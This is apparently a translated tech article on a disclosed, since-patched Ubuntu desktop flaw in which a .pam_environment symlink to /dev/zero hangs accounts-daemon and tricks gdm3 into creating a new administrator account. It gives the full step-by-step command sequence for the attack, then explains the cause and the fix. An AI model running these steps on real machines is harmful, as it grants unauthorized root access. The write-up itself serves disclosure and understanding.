How to Exploit and Patch Ubuntu’s Silent Sudo User Vulnerability

Attack Method

Open a terminal in your home directory and create a symbolic link named .pam_environment that points to /dev/zero: ln -s /dev/zero .pam_environment If the command fails, a .pam_environment file already exists; rename it as a backup before proceeding.

Next, open Settings → Region & Language and attempt to change the language. The dialog will freeze; simply ignore it and return to the terminal.

At this point the accounts-daemon process consumes 100 % CPU, slowing and heating the machine.

Delete the symbolic link to restore normal operation: rm .pam_environment Find the PID of accounts-daemon (it appears at the top of top because it is stuck in an infinite loop) or use pidof: pidof accounts-daemon Send a SIGSTOP signal to pause the daemon: kill -SIGSTOP 597 Set a timer that, after logging out, sends SIGSEGV and then SIGCONT to the daemon to force it to crash and reset:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597"

After logging out and waiting a few seconds, the exploit triggers a series of dialogs that allow you to create a new user account with administrator privileges, enabling sudo commands.

Attack Principle

The vulnerability exploits two bugs in Ubuntu:

The accountservice daemon (accounts‑daemon) reads a file named .pam_environment from the user’s home directory via a function is_in_pam_environment. By linking this file to /dev/zero, the daemon reads an infinitely long stream, causing it to hang and lose its root privileges.

The GNOME Display Manager ( gdm3 ) relies on accounts‑daemon to determine the number of existing users during the initial system setup. When accounts‑daemon is stuck, gdm3 times out, assumes zero users, and launches gnome-initial-setup, which requires an administrator account.

By crashing accounts‑daemon and forcing gdm3 to think no users exist, the attacker can create a new admin account without a password.

Official Fix

Security researcher Kevin Backhouse reported the bugs on October 17. Ubuntu and GNOME have released patches in the latest code; users should update their systems immediately.

The vulnerability only affects desktop editions of Ubuntu. Systems using only a command‑line interface or non‑GNOME desktop environments are not impacted.